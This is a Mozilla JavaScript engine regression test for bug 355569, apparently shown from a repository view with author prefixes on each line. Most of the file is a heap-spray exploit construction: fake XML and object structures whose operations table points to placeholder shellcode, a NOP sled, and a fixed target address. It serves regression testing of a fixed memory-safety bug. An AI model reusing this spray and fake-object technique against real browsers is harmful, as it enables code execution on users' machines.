michael@0: /* -*- Mode: java; tab-width:8; indent-tabs-mode: nil; c-basic-offset: 4 -*- */ michael@0: michael@0: /* This Source Code Form is subject to the terms of the Mozilla Public michael@0: * License, v. 2.0. If a copy of the MPL was not distributed with this michael@0: * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ michael@0: michael@0: var bug = 355569; michael@0: var actual = ''; michael@0: var expect = ''; michael@0: michael@0: printBugNumber (bug); michael@0: printStatus (summary); michael@0: michael@0: var targetAddress = 0x12030010; michael@0: var sprayParams = { michael@0: chunkSize: 16 * 1024 * 1024, michael@0: chunkCount: 16, michael@0: chunkMarker: 0xdeadface, michael@0: chunkAlign: 0x1000, michael@0: reservedSize: 1024 michael@0: }; michael@0: michael@0: function makeExploitCode() { michael@0: /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */ michael@0: return "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2"; michael@0: } michael@0: michael@0: /*==========================================================================*/ michael@0: /*==========================================================================*/ michael@0: michael@0: function packData(template, A) { michael@0: var n = 0, result = "", vl; michael@0: for(var i = 0; i < template.length; i++) { michael@0: var ch = template.charAt(i); michael@0: if(ch == "s" || ch == "S") { michael@0: vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff); michael@0: } else if(ch == "l" || ch == "L") { // XXX endian michael@0: vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff, vl >> 16); michael@0: } else if(ch == "=") { michael@0: result += String(A[n++]); michael@0: } michael@0: } michael@0: return result; michael@0: } michael@0: function buildStructure(worker, address) { michael@0: var offs = {}, result = "", context = { michael@0: append: function(k, v) { offs[k] = result.length * 2; result += v; }, michael@0: address: function(k) { return address + ((k && offs[k]) || 0); } michael@0: }; worker(context); result = ""; worker(context); return result; michael@0: } michael@0: function repeatToLength(s, L) { michael@0: if(L <= s.length) { return s.substring(0, L); } michael@0: while(s.length <= L/2) { s += s; } michael@0: return s + s.substring(0, L - s.length); michael@0: } michael@0: function sprayData(data, params, rooter) { michael@0: var marker = packData("L", [ params.chunkMarker ]); michael@0: data += repeatToLength("\u9090", params.chunkAlign / 2 - data.length); michael@0: data = repeatToLength(data, (params.chunkSize - params.reservedSize) / 2); michael@0: for(var i = 0; i < params.chunkCount; i++) { michael@0: rooter[i] = marker + data + i; michael@0: } michael@0: } michael@0: michael@0: function T_JSObject(map, slots) michael@0: { return packData("LL", arguments); } michael@0: function T_JSObjectMap(nrefs, ops, nslots, freeslot) michael@0: { return packData("LLLL", arguments); } michael@0: function T_JSObjectOps( michael@0: newObjectMap, destroyObjectMap, lookupProperty, defineProperty, michael@0: getProperty, setProperty, getAttributes, setAttributes, michael@0: deleteProperty, defaultValue, enumerate, checkAccess, michael@0: thisObject, dropProperty, call, construct, michael@0: xdrObject, hasInstance, setProto, setParent, michael@0: mark, clear, getRequiredSlot, setRequiredSlot michael@0: ) { return packData("LLLLLLLL LLLLLLLL LLLLLLLL", arguments); } michael@0: michael@0: function T_JSXML_LIST( michael@0: object, domnode, parent, name, xml_class, xml_flags, michael@0: kids_length, kids_capacity, kids_vector, kids_cursors, michael@0: xml_target, xml_targetprop michael@0: ) { return packData("LLLLSS LLLL LL", arguments); } michael@0: function T_JSXML_ELEMENT( michael@0: object, domnode, parent, name, xml_class, xml_flags, michael@0: kids_length, kids_capacity, kids_vector, kids_cursors, michael@0: nses_length, nses_capacity, nses_vector, nses_cursors, michael@0: atrs_length, atrs_capacity, atrs_vector, atrs_cursors michael@0: ) { return packData("LLLLSS LLLL LLLL LLLL", arguments); } michael@0: michael@0: /*==========================================================================*/ michael@0: /*==========================================================================*/ michael@0: michael@0: function makeExploitData(address) { michael@0: return buildStructure(function(ctx) { michael@0: ctx.append("xml-list", michael@0: T_JSXML_LIST(0, 0, 0, 0, 0, 0, 1, 0, ctx.address("xml-kids-vector"), 0, 0, 0)); michael@0: ctx.append("xml-kids-vector", michael@0: packData("L", [ ctx.address("xml-element") ])); michael@0: ctx.append("xml-element", michael@0: T_JSXML_ELEMENT(ctx.address("object"), 0, 0, 0, 1, 0, 0, 0, 0, 0, /*c*/ 0, 0, 0, 0, /*d*/ 0, 0, 0, 0)); michael@0: ctx.append("object", michael@0: T_JSObject(ctx.address("object-map"), 0)); michael@0: ctx.append("object-map", michael@0: T_JSObjectMap(0, ctx.address("object-ops"), 0, 0)); michael@0: ctx.append("object-ops", michael@0: T_JSObjectOps(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ctx.address("exploit-code"), 0)); michael@0: ctx.append("exploit-code", michael@0: makeExploitCode(ctx)); michael@0: }, address); michael@0: } michael@0: michael@0: function exploit() { michael@0: sprayData(makeExploitData(targetAddress), sprayParams, this.rooter = {}); michael@0: var numobj = new Number(targetAddress >> 1); michael@0: printStatus("probably not exploitable"); michael@0: } michael@0: michael@0: try michael@0: { michael@0: exploit(); michael@0: } michael@0: catch(ex) michael@0: { michael@0: } michael@0: michael@0: reportCompare(expect, actual); michael@0: